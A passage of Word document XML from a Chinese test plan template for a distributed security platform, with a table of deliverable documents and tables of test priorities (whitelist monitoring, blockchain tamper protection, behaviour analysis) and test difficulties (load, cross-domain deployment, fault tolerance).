          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>下表列出了制定和实施该测试方案时测试所需要提交的相关文档，并标明了各文档的可用性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D0033" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[注：列表中为文档项，需要具化，可适当地删除或添加文档项。]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1575"/>
        <w:gridCol w:w="1489"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="1429"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="2931EE67" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="074D7E12"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文档</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[具体的文档名称和列表（版本/日期）]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="42EA2E5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已创建或可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="2D00831E"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已被接收或已经过复审</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="07B2E2A1"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作者或来源</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[角色和姓名]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="74ACEDF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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="59BA7BC7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B93BEF4"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MRD、详细设计等评审批注意见</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E11992A"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342DCA48"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w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:sym w:font="Wingdings 2" w:char="0052"/>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>否□</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BB606E5"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713357C1"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13FBBA47" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622B5416"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测试计划</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>书</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3345C52E"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16AA52DA"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1F392035"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6D954EC5"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02190972" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B26000C"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测试开发需求</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>设计（关键字、工具等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BDCA66C"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1AE963D0"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06A6EF98"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4D424334"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694C25DB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="158C0EF1"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w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用例</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>设计</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3925F3B1"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0002AA5E"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014E7C31"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3AFF2571"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3E6D3598" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29552B9C"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测试报告（功能、性能、）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4376CC79"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3F8F1EC4"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709C12C0"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2E884FE1"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667795E6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EADCD4D"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项目总结</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CA9EEF1"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4E408A03"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1CFB75AD"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75DE267E"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77D7CEB4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14BE8893"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缺陷分析和测试设计补充</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8A3815"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0D965ED0"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5CC01BAA"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50F23B3F"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0BD39DB2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D21C208"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项目投入和时间数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031D8374"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1E48A4C0"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63E528A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69556369"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6A4E5930" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50557461"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测试陷阱tips</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795E8859"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3AA1B9BD"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695F67CA"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0C1DB250"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11495CE4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AC07422"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case study文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24341332"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7CD12CA4"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7FAA9AB7"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4EFE6A85"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01476CC5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467D51DF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="cente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项目成长记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50BAB6F2"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530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26094113"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是□否□</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C12439A"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QA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B852A5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C24798A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5770EA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc222309951"/>
      <w:bookmarkStart w:id="156" w:name="_Toc227386476"/>
      <w:bookmarkStart w:id="157" w:name="_Toc227386333"/>
      <w:bookmarkStart w:id="158" w:name="_Toc36487887"/>
      <w:bookmarkStart w:id="159" w:name="_Toc36573214"/>
      <w:bookmarkStart w:id="160" w:name="_Toc36630291"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试安排和计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="4B936E74" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc36487888"/>
      <w:bookmarkStart w:id="162" w:name="_Toc36573215"/>
      <w:bookmarkStart w:id="163" w:name="_Toc222309952"/>
      <w:bookmarkStart w:id="164" w:name="_Toc227386477"/>
      <w:bookmarkStart w:id="165" w:name="_Toc227386334"/>
      <w:bookmarkStart w:id="166" w:name="_Toc36630292"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试难点和重点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="72012520" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc36487889"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试重点</w:t>
      </w:r>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2551"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="78F3503C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="30FA4200"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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="0BC2B9C4"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重点项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="485D5DC8"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重要性说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="40E3A9BB"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="4A1814F0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2959FDD1"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C6B03AE"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可信防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3079125D"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实时对节点运行环境进行校验，当白名单出现变化时，及时报警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC23FD8"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3E790A18" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E8225E"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7B2833"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区块链防篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC1DAE9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>采用区</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>块链技术，对用户重要的数据、代码、文档等进行保护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16F7E0D5"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4E4DEDB7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448515D5"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A3616C"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用户行为分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DD4C4B"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通过人工智能对用户行为进行分析，形成人物画像，出现异常行为时自动报警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C4ADD8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EA572CE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc36487890"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试难点</w:t>
      </w:r>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2551"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="44EFA5E0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="4C3213D7"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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="382FF220"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难点项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="2268995B"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困难性说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="21D008D5"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="6F5ED504" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38BB5BB1"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B95C90"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负载能力，及大批量节点自动化测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1020A9D3"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作为一个分布式系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>server端对</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>并发读写</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>节点的支持数量，和软硬件资源的配置协调。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="501FCF41"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需要考虑自动化工具支持。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="7FE5BAB8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241EE394"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500D789C"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网络跨域部署，server端分组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD8DC54"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由于很多被保护节点，分布在不同的地点，需要进行跨域访问和回传系统状态和数据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D894C52"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报警实时性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0741BC69"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网络延迟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="01B2E8BC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3915FD"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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480D492D"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异常</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BD1B04"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作为一个</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>平台项目，系统要能够容忍各种软硬件异常</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
